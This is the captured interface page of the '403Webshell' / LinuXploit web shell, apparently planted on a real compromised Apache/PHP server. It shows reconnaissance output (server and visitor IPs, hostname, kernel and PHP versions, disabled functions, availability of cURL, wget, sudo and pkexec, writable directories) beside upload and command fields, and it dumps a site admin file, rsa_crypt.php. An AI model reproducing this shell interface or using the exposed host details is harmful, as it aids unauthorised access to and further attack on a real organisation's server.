403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/alliancealliance/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/alliancealliance/webadmin/rsa_crypt.php
<?php
	require_once('check_login.php');

	/*set_include_path(get_include_path() . PATH_SEPARATOR . 'phpseclib0.3.8');

	if (!class_exists('Crypt_RSA')) {
		include('phpseclib0.3.8/Crypt/RSA.php');
	}

	if (!class_exists('Net_SSH2')) {
		include('phpseclib0.3.8/Net/SSH2.php');
	}

	$rsa = new Crypt_RSA();

	extract($rsa->createKey()); // == $rsa->createKey(1024) where 1024 is the key size

	echo $publickey;
	echo "<br><br>";
	echo $privatekey;*/

	//exit;

	$string1 = "address";
	//$string2 = "vxnOxITjthN3l+bdnrfWgcmUBNyiGcv8M44lPO3tZ8GQZn3aerkrtrelakYAQxS8JBH37RvHHx0FfyBGwitYL2cHVPXt/2/irIdCz/hLyR8AfmF4aiRm6v+M+z4OV4tX3T4gCinYBC8+YNK/A4FKOiF00R8XYXiCoIkUC03jnYE=";

	if(!empty($string1)){
		echo rsa_crypt($string1, 1);
	}

	if(!empty($string2)){
		echo rsa_crypt($string2, 2);
	}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit